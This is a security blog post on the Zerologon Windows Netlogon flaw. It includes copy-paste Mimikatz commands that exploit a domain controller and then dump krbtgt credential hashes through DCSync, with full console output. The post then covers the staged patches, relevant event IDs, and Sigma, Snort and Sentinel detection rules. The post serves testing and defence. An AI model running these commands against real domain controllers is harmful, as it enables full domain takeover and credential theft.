CVE-2020-1472 aka Zerologon

TLDR

The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders. It was discovered by Tom Tervoort, a security researcher at Secura and privately reported to Microsoft, which issued a patch for supported Windows versions as part of August 2020 updates and assigned it CVE-2020-1472.

Introduction

Netscylla has been busy investigating the exploit on different systems, testing different Proof-of-Concept exploits. Often real-world systems behave differently, and unintended consequences can happen.

Exploit

Affected Systems

• Windows 2008 RC2 64bit
• Windows 2012
• Windows 2016
• Windows 2019
• Windows 1903/1909/2004

PoCs

• https://github.com/dirkjanm/CVE-2020-1472
• https://github.com/VoidSec/CVE-2020-1472
• https://github.com/gentilkiwi/mimikatz

Note: for the python PoCs to work correctly, you’ll need to update impacket:

• https://github.com/SecureAuthCorp/impacket

Using Mimikatz

Commands - for copy n paste ease of use

lsadump::zerologon /target:dc1.exploit.local /account:dc1$
lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt

Important:

• /target is the full fqdn of the target dc
• /account variable is the name of the dc followed by $

Example Usage:

C:\Users\user\Downloads\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$
Remote   : dc1.exploit.local
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : dc1.exploit.local
Account: dc1$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
=========================================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable

mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
Remote   : dc1.exploit.local
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : dc1.exploit.local
Account: dc1$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
===========================================================================

  NetrServerAuthenticate2: 0x00000000
  NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz # lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
[DC] 'exploit.local' will be the domain
[DC] 'dc1.exploit.local' will be the DC server
[DC] 'krbtgt' will be the user account
[AUTH] Username: dc1$
[AUTH] Domain  : exploit.local
[AUTH] Password:
[AUTH] Explicit NTLM Mode

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 22/09/2020 16:12:29
Object Security ID   : S-1-5-21-1015760042-408406534-773346051-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
    ntlm- 0: 75c424*****************58e088f92
    lm  - 0: 7c0800*****************df0fa84b0

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 0a17042d1d448f9266f9dafd4a7611cb

* Primary:Kerberos-Newer-Keys *
    Default Salt : EXPLOIT.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 810382037847ad39412f0aba970962ddfb796585330b97877a455c9582a05c68
      aes128_hmac       (4096) : b4c2cd6d8c005525316b006ca3c8cb51
      des_cbc_md5       (4096) : 4f45195db5972f3b

* Primary:Kerberos *
    Default Salt : EXPLOIT.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 4f45195db5972f3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  1563c7e64e0815b57efcfcb5ae22dc90
    02  3d61549adf12841ae05a09460b8edaed
    03  fb64dbb289618735c2da07b6a1f702f4
    04  1563c7e64e0815b57efcfcb5ae22dc90
    05  3d61549adf12841ae05a09460b8edaed
    06  1b6e21b21a8fd92ca8bf4d294bfc3f60
    07  1563c7e64e0815b57efcfcb5ae22dc90
    08  30a7542e7f5a3fa253623ca09c8fae36
    09  30a7542e7f5a3fa253623ca09c8fae36
    10  87e128fecc1e329456679440174cf983
    11  212e2fabaedea53a6027d6a92c2c0d6e
    12  30a7542e7f5a3fa253623ca09c8fae36
    13  cfc27bc0430086e95ab3426e1d9e7dfd
    14  212e2fabaedea53a6027d6a92c2c0d6e
    15  5d0fd6579eb09201d85744a7142999d9
    16  5d0fd6579eb09201d85744a7142999d9
    17  597bdfe4008ee6d70351bd984e23f306
    18  f517e48a822e71e63b17c44574fcde13
    19  7379256ad109be5d3d8c42a6815730fd
    20  6c8ecb285f193bcdf46022426ff5e6a2
    21  6bb3bf4cd601b7c44cb36586c70bec82
    22  6bb3bf4cd601b7c44cb36586c70bec82
    23  4a5cc09043c5089904392f3240fe51a8
    24  679dfdf11e1ec5b6a928a1acc30a49b4
    25  679dfdf11e1ec5b6a928a1acc30a49b4
    26  4517e188beee795177e2a2382b722cf6
    27  f6c02a4415a0dad8ccc15f913c4dcf25
    28  8b830ad87aab13f3c12a6d8f6eb2a6ae
    29  b554dbcba6aebf1931c299a502f35cff

mimikatz #

Results from our testing

Setting up a fresh fully patched 2016 Domain Controller, we were vulnerable and you can see the mimikatz output above.

However, attacking a hardened DC; One where we use a custom authentication GINA from a 3rd party for MFA, and MFA is enforced for all DC User communciation - the exploit failed. The error in our logs was 5805 - Error - the machine failed to autneticate.

We spent time trying to get to the bottom of the error, if it was down to a specific hardening setting, or whether it was the 2FA authentication mechanism. In the end we concluded it was the 3rd Party 2FA software that effected the success of the exploit. Therefore, we conclude that it is always worth testing the legitimacy of an exploit on your own test-domain as real-life system improvements or changes can vastly change the outcome of a successful exploit.

Patches, Updates, am I vulnerable?

Yes you may be patched, but you may be vulnerable. Microsoft released a patch in August CVE-2020-1472. However, if you fully read the advisory, you would know the patch is released in two phases.

• Phase 1 - installs the patch, but does not enforce the fix, it also installs additional EventIDs for logging and debugging purposes
• Phase 2 - February 2021, forces the patch/fix into enforcement mode.

You may also want to read https://support.microsoft.com/en-gb/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Useful EventIDs: old and new

• Event ID - 4742; A computer account was changed, specifically the action may have been performed by an anonymous logon event.
• Event ID - 5805; A machine account failed to authenticate; Which is usually caused by either multiple instances of the same computer name, or the computer name has not replicated to every domain controller, or the use of a custom GINA.
• Event Code 4624; Notes a successful login to the machine, specifically an event code 4624, followed by an event code of 4724 is triggered when the vulnerability is exploited on hosts.
• Event ID - 4662; If a DCSync attack has been carried out
• Event IDs 5827 and 5828; Connections denied
• Event ID 5829; Whenever a vulnerable Netlogon secure channel connection is allowed.
• Event IDs 5830 and 5831; If connections are allowed by “Domain controller: Allow vulnerable Netlogon secure channel connections” group policy.
• Sysmon Event ID 3; The network connection event logs TCP/UDP connections on the machine. An incoming network connection is made from the attacking machine to the victim Domain Controller to the LSASS process when the Zerologon event occurs

Detection

Soc Prime Sigma Rule:

title: Possible CVE-2020-1472 (zerologon)
description: CVE-2020-1472 (Netlogon Elevation of Privilege Vulnerability) may create thousands of NetrServerReqChallenge & NetrServerAuthenticate3 requests in a short amount of time.
author: SOC Prime Team
date: 2020/09/11
references:
- https://github.com/SecuraBV/CVE-2020-1472
tags:
- attack.lateral_movement
- attack.T1210
logsource:
  product: zeek
  service: dce_rpc
detection:
  selection:
    endpoint: 'netlogon'
    operation: 'NetrServerReqChallenge'
  selection2:
    endpoint: 'netlogon'
    operation: 'NetrServerAuthenticate3'
  timeframe: 1m
  condition: selection or selection2 | count() by src_ip > 100
falsepositives:
- 'unknown'
level: high

Snort Rule

alert tcp any any -> [!<domaincontrollers to exclude here] [49152:65535] (msg:"Possible DCSync Detected"; flow:to_server,established; flags:PA; content:"|00 03 10 00 00 00|"; depth:8; content:"|03 00|"; distance:14; classtype:attempted-admin; sid:20166316;)

Azure Sentinel Query

Dce_Rpc | where (endpoint == "netlogon" and (operation == "NetrServerReqChallenge" or operation == "NetrServerAuthenticate3")) | summarize var = count() by SourceIp | where var > 100

---

Share on: